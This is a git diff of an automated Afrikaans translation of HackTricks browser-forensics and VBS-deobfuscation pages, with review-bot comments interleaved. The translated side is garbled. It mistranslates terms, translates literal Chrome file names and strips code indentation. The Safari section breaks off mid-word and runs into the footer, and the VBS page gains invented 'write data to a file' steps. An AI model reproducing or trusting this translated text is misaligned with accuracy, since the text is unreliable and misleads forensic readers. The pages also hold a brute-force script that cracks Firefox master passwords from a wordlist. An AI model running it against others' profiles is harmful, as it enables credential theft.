[**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
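Review bot: the hunk headers `@@ -1,21 +1,19 @@` and `@@ -41,16 +39,14 @@` show this file shrinking by four lines although the only translated sentence is "Hier kan jy interessante truuks vir spesifieke lêertipes en/of sagteware vind:"; the missing lines are blank separators that the workflow stripped around the banner and footer. Whitespace-only churn like this makes every future upstream sync conflict on the same lines, so the translation step should preserve blank lines and emit changes only where text actually changed. The footer translation here ("GitHub-opslagplekke") also differs from the one used in the previous file ("github-repos"); see the note on that hunk about using one canonical boilerplate string.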
- - diff --git a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md index 1db184503..be835bfbf 100644 --- a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md +++ b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md @@ -1,80 +1,80 @@ -# Browser Artifacts +# Blaaier Artefakte
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
\ -Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: +Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik en **outomatiese werkstrome** te bou met behulp van die wêreld se **mees gevorderde** gemeenskapsinstrumente.\ +Kry vandag toegang: {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} -## Browsers Artifacts +## Blaaier Artefakte -Browser artifacts include various types of data stored by web browsers, such as navigation history, bookmarks, and cache data. These artifacts are kept in specific folders within the operating system, differing in location and name across browsers, yet generally storing similar data types. +Blaaier artefakte sluit verskillende soorte data in wat deur webblaaier gestoor word, soos navigasiegeskiedenis, bladmerke en kasdata. Hierdie artefakte word in spesifieke lêers binne die bedryfstelsel gehou, wat verskil in ligging en naam oor blaaier, maar oor die algemeen soortgelyke datatipes stoor. -Here's a summary of the most common browser artifacts: +Hier is 'n opsomming van die mees algemene blaaier artefakte: -- **Navigation History**: Tracks user visits to websites, useful for identifying visits to malicious sites. -- **Autocomplete Data**: Suggestions based on frequent searches, offering insights when combined with navigation history. -- **Bookmarks**: Sites saved by the user for quick access. -- **Extensions and Add-ons**: Browser extensions or add-ons installed by the user. -- **Cache**: Stores web content (e.g., images, JavaScript files) to improve website loading times, valuable for forensic analysis. -- **Logins**: Stored login credentials. 
-- **Favicons**: Icons associated with websites, appearing in tabs and bookmarks, useful for additional information on user visits. -- **Browser Sessions**: Data related to open browser sessions. -- **Downloads**: Records of files downloaded through the browser. -- **Form Data**: Information entered in web forms, saved for future autofill suggestions. -- **Thumbnails**: Preview images of websites. -- **Custom Dictionary.txt**: Words added by the user to the browser's dictionary. +- **Navigasiegeskiedenis**: Hou by watter webwerwe die gebruiker besoek het, nuttig om besoeke aan skadelike webwerwe te identifiseer. +- **Outomatiese voltooiingsdata**: Voorstelle gebaseer op gereelde soektogte, bied insigte wanneer dit gekombineer word met navigasiegeskiedenis. +- **Bladmerke**: Webwerwe wat deur die gebruiker gestoor is vir vinnige toegang. +- **Uitbreidings en Byvoegings**: Blaaieruitbreidings of byvoegings wat deur die gebruiker geïnstalleer is. +- **Kas**: Stoor webinhoud (bv. beelde, JavaScript-lêers) om webwerflaaitye te verbeter, waardevol vir forensiese analise. +- **Aantekeninge**: Gestoorde aanmeldingslegitimasie. +- **Favicons**: Ikone wat met webwerwe geassosieer word en in blaaierblaaie en bladmerke verskyn, nuttig vir addisionele inligting oor gebruikersbesoeke. +- **Blaaier-sessies**: Data wat verband hou met oop blaaier-sessies. +- **Aflaaiers**: Rekords van lêers wat deur die blaaier afgelaai is. +- **Vormdata**: Inligting wat in webvorms ingevoer is en gestoor word vir toekomstige outomatiese voltooiingsvoorstelle. +- **Duimnaels**: Voorskou-afbeeldings van webwerwe. +- **Custom Dictionary.txt**: Woorde wat deur die gebruiker by die blaaier se woordeboek gevoeg is. 
## Firefox -Firefox organizes user data within profiles, stored in specific locations based on the operating system: +Firefox organiseer gebruikersdata binne profiele, wat in spesifieke liggings volgens die bedryfstelsel gestoor word: - **Linux**: `~/.mozilla/firefox/` - **MacOS**: `/Users/$USER/Library/Application Support/Firefox/Profiles/` - **Windows**: `%userprofile%\AppData\Roaming\Mozilla\Firefox\Profiles\` -A `profiles.ini` file within these directories lists the user profiles. Each profile's data is stored in a folder named in the `Path` variable within `profiles.ini`, located in the same directory as `profiles.ini` itself. If a profile's folder is missing, it may have been deleted. +'n `profiles.ini`-lêer binne hierdie gidslys die gebruikersprofiele. Elke profiel se data word in 'n vouer gestoor wat genoem word in die `Path`-veranderlike binne `profiles.ini`, wat in dieselfde gids as `profiles.ini` self geleë is. As 'n profiel se vouer ontbreek, is dit moontlik uitgevee. -Within each profile folder, you can find several important files: +Binne elke profielvouer kan jy verskeie belangrike lêers vind: -- **places.sqlite**: Stores history, bookmarks, and downloads. Tools like [BrowsingHistoryView](https://www.nirsoft.net/utils/browsing_history_view.html) on Windows can access the history data. - - Use specific SQL queries to extract history and downloads information. -- **bookmarkbackups**: Contains backups of bookmarks. -- **formhistory.sqlite**: Stores web form data. -- **handlers.json**: Manages protocol handlers. -- **persdict.dat**: Custom dictionary words. -- **addons.json** and **extensions.sqlite**: Information on installed add-ons and extensions. -- **cookies.sqlite**: Cookie storage, with [MZCookiesView](https://www.nirsoft.net/utils/mzcv.html) available for inspection on Windows. -- **cache2/entries** or **startupCache**: Cache data, accessible through tools like [MozillaCacheView](https://www.nirsoft.net/utils/mozilla_cache_viewer.html). 
-- **favicons.sqlite**: Stores favicons. -- **prefs.js**: User settings and preferences. -- **downloads.sqlite**: Older downloads database, now integrated into places.sqlite. -- **thumbnails**: Website thumbnails. -- **logins.json**: Encrypted login information. -- **key4.db** or **key3.db**: Stores encryption keys for securing sensitive information. +- **places.sqlite**: Stoor geskiedenis, bladmerke en aflaaie. Gereedskap soos [BrowsingHistoryView](https://www.nirsoft.net/utils/browsing_history_view.html) op Windows kan toegang verkry tot die geskiedenisdata. +- Gebruik spesifieke SQL-navrae om geskiedenis- en aflaaie-inligting te onttrek. +- **bookmarkbackups**: Bevat rugsteun van bladmerke. +- **formhistory.sqlite**: Stoor webvormdata. +- **handlers.json**: Bestuur protokolhanteraars. +- **persdict.dat**: Aangepaste woordeboekwoorde. +- **addons.json** en **extensions.sqlite**: Inligting oor geïnstalleerde byvoegings en uitbreidings. +- **cookies.sqlite**: Koekie-opberging, met [MZCookiesView](https://www.nirsoft.net/utils/mzcv.html) beskikbaar vir inspeksie op Windows. +- **cache2/entries** of **startupCache**: Kasdata, toeganklik deur gereedskap soos [MozillaCacheView](https://www.nirsoft.net/utils/mozilla_cache_viewer.html). +- **favicons.sqlite**: Stoor favicons. +- **prefs.js**: Gebruikersinstellings en voorkeure. +- **downloads.sqlite**: Ouer aflaaie-databasis, nou geïntegreer in places.sqlite. +- **thumbnails**: Webwerf-duimnaels. +- **logins.json**: Versleutelde aanmeldingsinligting. +- **key4.db** of **key3.db**: Stoor versleutelingssleutels vir die beveiliging van sensitiewe inligting. -Additionally, checking the browser’s anti-phishing settings can be done by searching for `browser.safebrowsing` entries in `prefs.js`, indicating whether safe browsing features are enabled or disabled. 
+Daarbenewens kan die blaaier se anti-phishing-instellings nagegaan word deur te soek na `browser.safebrowsing`-inskrywings in `prefs.js`, wat aandui of veilige blaaierfunksies geaktiveer of gedeaktiveer is. -To try to decrypt the master password, you can use [https://github.com/unode/firefox\_decrypt](https://github.com/unode/firefox\_decrypt)\ -With the following script and call you can specify a password file to brute force: +Om te probeer om die meesterwagwoord te ontsluit, kan jy [https://github.com/unode/firefox\_decrypt](https://github.com/unode/firefox\_decrypt) gebruik.\ +Met die volgende skripsie en oproep kan jy 'n wagwoordlêer spesifiseer om kragtig te krag: {% code title="brute.sh" %} ```bash @@ -83,8 +83,8 @@ With the following script and call you can specify a password file to brute forc #./brute.sh top-passwords.txt 2>/dev/null | grep -A2 -B2 "chrome:" passfile=$1 while read pass; do - echo "Trying $pass" - echo "$pass" | python firefox_decrypt.py +echo "Trying $pass" +echo "$pass" | python firefox_decrypt.py done < $passfile ``` {% endcode %} 
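Review bot: in the Firefox list the nested bullet under places.sqlite lost its indentation, `-  - Use specific SQL queries to extract history and downloads information.` became `+- Gebruik spesifieke SQL-navrae om geskiedenis- en aflaaie-inligting te onttrek.`, so it now renders as an unrelated top-level item; restore the two leading spaces. The same stripping hit the fenced `brute.sh` block in the `@@ -83,8 +83,8 @@` hunk (`-  echo "Trying $pass"` became `+echo "Trying $pass"`): the workflow should pass fenced code blocks through byte-for-byte, since it clearly cannot be trusted to leave them alone. A few translated terms change the meaning for a forensic reader and should be corrected: "skripsie" means a thesis (use "skrip"), "om kragtig te krag" is not a rendering of "brute force" (keep "brute force" or use "met brute krag te probeer"), "Aantekeninge" means notes rather than logins (use "Aanmeldings"), "Aflaaiers" means downloaders rather than downloads (use "Aflaaie"), and "in spesifieke lêers" says files where the source says folders (use "gidse"). The Trickest banner sentence "om maklik en outomatiese werkstrome te bou" also drops the verb "automate"; the source reads "easily build and automate workflows".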
@@ -93,113 +93,76 @@ done < $passfile ## Google Chrome -Google Chrome stores user profiles in specific locations based on the operating system: +Google Chrome stoor gebruikersprofielle in spesifieke liggings gebaseer op die bedryfstelsel: - **Linux**: `~/.config/google-chrome/` - **Windows**: `C:\Users\XXX\AppData\Local\Google\Chrome\User Data\` - **MacOS**: `/Users/$USER/Library/Application Support/Google/Chrome/` -Within these directories, most user data can be found in the **Default/** or **ChromeDefaultData/** folders. The following files hold significant data: +Binne hierdie gids, kan die meeste gebruikersdata gevind word in die **Default/** of **ChromeDefaultData/** gids. Die volgende lêers bevat belangrike data: -- **History**: Contains URLs, downloads, and search keywords. On Windows, [ChromeHistoryView](https://www.nirsoft.net/utils/chrome_history_view.html) can be used to read the history. The "Transition Type" column has various meanings, including user clicks on links, typed URLs, form submissions, and page reloads. -- **Cookies**: Stores cookies. For inspection, [ChromeCookiesView](https://www.nirsoft.net/utils/chrome_cookies_view.html) is available. -- **Cache**: Holds cached data. To inspect, Windows users can utilize [ChromeCacheView](https://www.nirsoft.net/utils/chrome_cache_view.html). -- **Bookmarks**: User bookmarks. -- **Web Data**: Contains form history. -- **Favicons**: Stores website favicons. -- **Login Data**: Includes login credentials like usernames and passwords. -- **Current Session**/**Current Tabs**: Data about the current browsing session and open tabs. -- **Last Session**/**Last Tabs**: Information about the sites active during the last session before Chrome was closed. -- **Extensions**: Directories for browser extensions and addons. -- **Thumbnails**: Stores website thumbnails. -- **Preferences**: A file rich in information, including settings for plugins, extensions, pop-ups, notifications, and more. 
-- **Browser’s built-in anti-phishing**: To check if anti-phishing and malware protection are enabled, run `grep 'safebrowsing' ~/Library/Application Support/Google/Chrome/Default/Preferences`. Look for `{"enabled: true,"}` in the output. +- **Geskiedenis**: Bevat URL's, aflaaiers, en soek sleutelwoorde. Op Windows, kan [ChromeHistoryView](https://www.nirsoft.net/utils/chrome_history_view.html) gebruik word om die geskiedenis te lees. Die "Transition Type" kolom het verskillende betekenisse, insluitend gebruiker klieke op skakels, getikte URL's, vorm indienings, en bladsy herlaaiings. +- **Koekies**: Stoor koekies. Vir inspeksie, is [ChromeCookiesView](https://www.nirsoft.net/utils/chrome_cookies_view.html) beskikbaar. +- **Cache**: Hou gekasde data. Om te inspekteer, kan Windows gebruikers [ChromeCacheView](https://www.nirsoft.net/utils/chrome_cache_view.html) gebruik. +- **Bladmerke**: Gebruiker bladmerke. +- **Web Data**: Bevat vorm geskiedenis. +- **Favicons**: Stoor webwerf favicons. +- **Login Data**: Sluit aanmeldingslegitimasie soos gebruikersname en wagwoorde in. +- **Huidige Sessie**/**Huidige Vlakke**: Data oor die huidige blaaier sessie en oop vlakke. +- **Laaste Sessie**/**Laaste Vlakke**: Inligting oor die webwerwe aktief gedurende die laaste sessie voor Chrome gesluit is. +- **Uitbreidings**: Gids vir blaaier uitbreidings en addons. +- **Duimnaels**: Stoor webwerf duimnaels. +- **Voorkeure**: 'n Lêer ryk aan inligting, insluitend instellings vir plugins, uitbreidings, pop-ups, kennisgewings, en meer. +- **Blaaier se ingeboude anti-phishing**: Om te kyk of anti-phishing en malware beskerming geaktiveer is, voer `grep 'safebrowsing' ~/Library/Application Support/Google/Chrome/Default/Preferences` uit. Kyk vir `{"enabled: true,"}` in die uitset. -## **SQLite DB Data Recovery** +## **SQLite DB Data Herwinning** -As you can observe in the previous sections, both Chrome and Firefox use **SQLite** databases to store the data. 
It's possible to **recover deleted entries using the tool** [**sqlparse**](https://github.com/padfoot999/sqlparse) **or** [**sqlparse\_gui**](https://github.com/mdegrazia/SQLite-Deleted-Records-Parser/releases). +Soos waargeneem kan word in die vorige afdelings, gebruik beide Chrome en Firefox **SQLite** databasisse om die data te stoor. Dit is moontlik om **verwyderde inskrywings te herwin met behulp van die instrumente** [**sqlparse**](https://github.com/padfoot999/sqlparse) **of** [**sqlparse\_gui**](https://github.com/mdegrazia/SQLite-Deleted-Records-Parser/releases). ## **Internet Explorer 11** -Internet Explorer 11 manages its data and metadata across various locations, aiding in separating stored information and its corresponding details for easy access and management. +Internet Explorer 11 bestuur sy data en metadata oor verskillende liggings, wat help om gestoorde inligting en die ooreenstemmende besonderhede te skei vir maklike toegang en bestuur. -### Metadata Storage -Metadata for Internet Explorer is stored in `%userprofile%\Appdata\Local\Microsoft\Windows\WebCache\WebcacheVX.data` (with VX being V01, V16, or V24). Accompanying this, the `V01.log` file might show modification time discrepancies with `WebcacheVX.data`, indicating a need for repair using `esentutl /r V01 /d`. This metadata, housed in an ESE database, can be recovered and inspected using tools like photorec and [ESEDatabaseView](https://www.nirsoft.net/utils/ese_database_view.html), respectively. Within the **Containers** table, one can discern the specific tables or containers where each data segment is stored, including cache details for other Microsoft tools such as Skype. +### Metadata Berging +Metadata vir Internet Explorer word gestoor in `%userprofile%\Appdata\Local\Microsoft\Windows\WebCache\WebcacheVX.data` (met VX wat V01, V16, of V24 kan wees). 
Tesame hiermee, kan die `V01.log` lêer wysigingstyd afwykings met `WebcacheVX.data` toon, wat dui op 'n behoefte vir herstel met behulp van `esentutl /r V01 /d`. Hierdie metadata, wat in 'n ESE databasis gehuisves word, kan herwin en ondersoek word met behulp van instrumente soos photorec en [ESEDatabaseView](https://www.nirsoft.net/utils/ese_database_view.html) onderskeidelik. Binne die **Containers** tabel, kan 'n mens die spesifieke tabelle of houers waar elke data segment gestoor word, onderskei, insluitend cache besonderhede vir ander Microsoft gereedskap soos Skype. -### Cache Inspection -The [IECacheView](https://www.nirsoft.net/utils/ie_cache_viewer.html) tool allows for cache inspection, requiring the cache data extraction folder location. Metadata for cache includes filename, directory, access count, URL origin, and timestamps indicating cache creation, access, modification, and expiry times. +### Cache Inspeksie +Die [IECacheView](https://www.nirsoft.net/utils/ie_cache_viewer.html) instrument maak dit moontlik om die cache te inspekteer, met die vereiste van die cache data onttrekkingsgids. Metadata vir die cache sluit lêernaam, gids, toegangstellings, URL oorsprong, en tydstempels wat cache skepping, toegang, wysiging, en verval tyd aandui. -### Cookies Management -Cookies can be explored using [IECookiesView](https://www.nirsoft.net/utils/iecookies.html), with metadata encompassing names, URLs, access counts, and various time-related details. Persistent cookies are stored in `%userprofile%\Appdata\Roaming\Microsoft\Windows\Cookies`, with session cookies residing in memory. +### Koekies Bestuur +Koekies kan ondersoek word met behulp van [IECookiesView](https://www.nirsoft.net/utils/iecookies.html), met metadata wat name, URL's, toegangstellings, en verskeie tydverwante besonderhede insluit. Volgehoue koekies word gestoor in `%userprofile%\Appdata\Roaming\Microsoft\Windows\Cookies`, met sessie koekies wat in die geheue bly. 
-### Download Details -Downloads metadata is accessible via [ESEDatabaseView](https://www.nirsoft.net/utils/ese_database_view.html), with specific containers holding data like URL, file type, and download location. Physical files can be found under `%userprofile%\Appdata\Roaming\Microsoft\Windows\IEDownloadHistory`. +### Aflaaibesonderhede +Aflaaibesonderhede is toeganklik via [ESEDatabaseView](https://www.nirsoft.net/utils/ese_database_view.html), met spesifieke houers wat data soos URL, lêertipe, en aflaaigids bevat. Fisiese lêers kan gevind word onder `%userprofile%\Appdata\Roaming\Microsoft\Windows\IEDownloadHistory`. -### Browsing History -To review browsing history, [BrowsingHistoryView](https://www.nirsoft.net/utils/browsing_history_view.html) can be used, requiring the location of extracted history files and configuration for Internet Explorer. Metadata here includes modification and access times, along with access counts. History files are located in `%userprofile%\Appdata\Local\Microsoft\Windows\History`. +### Blaai Geskiedenis +Om blaai geskiedenis te hersien, kan [BrowsingHistoryView](https://www.nirsoft.net/utils/browsing_history_view.html) gebruik word, met die vereiste van die ligging van die uitgepakte geskiedenis lêers en konfigurasie vir Internet Explorer. Metadata hier sluit wysiging en toegangstye in, tesame met toegangstellings. Geskiedenis lêers is geleë in `%userprofile%\Appdata\Local\Microsoft\Windows\History`. -### Typed URLs -Typed URLs and their usage timings are stored within the registry under `NTUSER.DAT` at `Software\Microsoft\InternetExplorer\TypedURLs` and `Software\Microsoft\InternetExplorer\TypedURLsTime`, tracking the last 50 URLs entered by the user and their last input times. 
+### Getikte URL's +Getikte URL's en hul gebruikstye word binne die register gestoor onder `NTUSER.DAT` by `Software\Microsoft\InternetExplorer\TypedURLs` en `Software\Microsoft\InternetExplorer\TypedURLsTime`, wat die laaste 50 URL's wat deur die gebruiker ingevoer is en hul laaste inset tye volg. ## Microsoft Edge -Microsoft Edge stores user data in `%userprofile%\Appdata\Local\Packages`. The paths for various data types are: +Microsoft Edge stoor gebruikersdata in `%userprofile%\Appdata\Local\Packages`. Die paaie vir verskillende datatipes is: -- **Profile Path**: `C:\Users\XX\AppData\Local\Packages\Microsoft.MicrosoftEdge_XXX\AC` -- **History, Cookies, and Downloads**: `C:\Users\XX\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat` -- **Settings, Bookmarks, and Reading List**: `C:\Users\XX\AppData\Local\Packages\Microsoft.MicrosoftEdge_XXX\AC\MicrosoftEdge\User\Default\DataStore\Data\nouser1\XXX\DBStore\spartan.edb` +- **Profiel Pad**: `C:\Users\XX\AppData\Local\Packages\Microsoft.MicrosoftEdge_XXX\AC` +- **Geskiedenis, Koekies, en Aflaaibestande**: `C:\Users\XX\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat` +- **Instellings, Bladmerke, en Leeslys**: `C:\Users\XX\AppData\Local\Packages\Microsoft.MicrosoftEdge_XXX\AC\MicrosoftEdge\User\Default\DataStore\Data\nouser1\XXX\DBStore\spartan.edb` - **Cache**: `C:\Users\XXX\AppData\Local\Packages\Microsoft.MicrosoftEdge_XXX\AC#!XXX\MicrosoftEdge\Cache` -- **Last Active Sessions**: `C:\Users\XX\AppData\Local\Packages\Microsoft.MicrosoftEdge_XXX\AC\MicrosoftEdge\User\Default\Recovery\Active` +- **Laaste Aktiewe Sessies**: `C:\Users\XX\AppData\Local\Packages\Microsoft.MicrosoftEdge_XXX\AC\MicrosoftEdge\User\Default\Recovery\Active` ## Safari -Safari data is stored at `/Users/$User/Library/Safari`. Key files include: +Safari data word gestoor by `/Users/$User/Library/Safari`. Sleutellêers sluit in: -- **History.db**: Contains `history_visits` and `history_items` tables with URLs and visit timestamps. 
Use `sqlite3` to query. -- **Downloads.plist**: Information about downloaded files. -- **Bookmarks.plist**: Stores bookmarked URLs. -- **TopSites.plist**: Most frequently visited sites. -- **Extensions.plist**: List of Safari browser extensions. Use `plutil` or `pluginkit` to retrieve. -- **UserNotificationPermissions.plist**: Domains permitted to push notifications. Use `plutil` to parse. -- **LastSession.plist**: Tabs from the last session. Use `plutil` to parse. -- **Browser’s built-in anti-phishing**: Check using `defaults read com.apple.Safari WarnAboutFraudulentWebsites`. A response of 1 indicates the feature is active. - -## Opera - -Opera's data resides in `/Users/$USER/Library/Application Support/com.operasoftware.Opera` and shares Chrome's format for history and downloads. - -- **Browser’s built-in anti-phishing**: Verify by checking if `fraud_protection_enabled` in the Preferences file is set to `true` using `grep`. - -These paths and commands are crucial for accessing and understanding the browsing data stored by different web browsers. - - -## References -* [https://nasbench.medium.com/web-browsers-forensics-7e99940c579a](https://nasbench.medium.com/web-browsers-forensics-7e99940c579a) -* [https://www.sentinelone.com/labs/macos-incident-response-part-3-system-manipulation/](https://www.sentinelone.com/labs/macos-incident-response-part-3-system-manipulation/) -* [https://books.google.com/books?id=jfMqCgAAQBAJ&pg=PA128&lpg=PA128&dq=%22This+file](https://books.google.com/books?id=jfMqCgAAQBAJ&pg=PA128&lpg=PA128&dq=%22This+file) -* **Book: OS X Incident Response: Scripting and Analysis By Jaron Bradley pag 123** - - -
- -\ -Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} - -
- -Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! - -Other ways to support HackTricks: - -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +- **History.db**: Bevat `history_visits` en `history_items` tabelle met URL's en besoek tydstempels. Gebruik `sqlite3` om navrae te doen. +- **Downloads.plist**: Inligting oor afgelaai lêers. +- **Bookmarks.plist**: Stoor gebl +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**Die PEASS Familie**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord groep**](https://discord.gg/hRep4RUj7f) of die [**telegram groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking truuks deur PRs in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
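Review bot: this hunk must not be merged as is, because the translated side is truncated. The Safari list ends mid-word at `+- **Bookmarks.plist**: Stoor gebl` and jumps straight into the footer, so everything after it appears only as `-` lines with no `+` counterpart: TopSites.plist, Extensions.plist, UserNotificationPermissions.plist, LastSession.plist, the Safari and Opera anti-phishing checks, the whole `## Opera` section, the closing sentence, the `## References` list with its four entries, and the second Trickest banner. The header `@@ -93,113 +93,76 @@` confirms a net loss of 37 lines with nothing to account for it except the cut-off. This is what a translation model output hitting its length limit looks like; regenerate the file in smaller chunks and have the workflow fail the page when the translated line count differs from the source by more than the known boilerplate delta, or when a line ends without punctuation where the source had some. A second problem in the Chrome list: the bolded entries are literal file and directory names under `Default/` that an analyst has to locate on disk, yet they were translated (`+- **Huidige Sessie**/**Huidige Vlakke**`, `+- **Uitbreidings**`, `+- **Duimnaels**`, `+- **Voorkeure**`) while the Firefox section correctly left `places.sqlite`, `logins.json` and friends untouched; keep the names as Chrome writes them (Current Session, Current Tabs, Extensions, Thumbnails, Preferences), and note that "Vlakke" means levels, not tabs. "Aflaaibestande" in the Edge list is also inconsistent with "Aflaaie"/"Aflaaiers" used elsewhere in the same file.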
diff --git a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md index e1fb4471c..25fa36822 100644 --- a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md +++ b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md @@ -1,81 +1,87 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
-Some things that could be useful to debug/deobfuscate a malicious VBS file: +Sommige dinge wat nuttig kan wees om 'n skadelike VBS-lêer te ontleed/deobfuskasie: ## echo - ```bash Wscript.Echo "Like this?" ``` - -## Commnets - +## Kommentaar ```bash ' this is a comment ``` - -## Test - +## Toets ```bash cscript.exe file.vbs ``` +## Skryf data na 'n lêer -## Write data to a file +Om data na 'n lêer te skryf, kan jy die volgende stappe volg: +1. Maak 'n nuwe lêer aan deur die lêer te skep met die gewenste naam en lêeruitbreiding. Byvoorbeeld, as jy 'n lêer met die naam "data.txt" wil skep, kan jy die volgende opdrag gebruik: + + ```bash + echo > data.txt + ``` + +2. Open die lêer in 'n teksredigeerder of skryfprogram. Jy kan 'n teksredigeerder soos Notepad++ of Vim gebruik. + +3. Skryf die data wat jy wil stoor in die lêer. Jy kan enige teks of binêre data in die lêer skryf. Byvoorbeeld: + + ```bash + echo "Dit is 'n voorbeeld van data wat in die lêer geskryf word." > data.txt + ``` + +4. Stoor die veranderinge en sluit die lêer. + +Nou sal die spesifiseerde data in die lêer gestoor word. ```js Function writeBinary(strBinary, strPath) - Dim oFSO: Set oFSO = CreateObject("Scripting.FileSystemObject") +Dim oFSO: Set oFSO = CreateObject("Scripting.FileSystemObject") - ' below lines purpose: checks that write access is possible! - Dim oTxtStream +' below lines purpose: checks that write access is possible! 
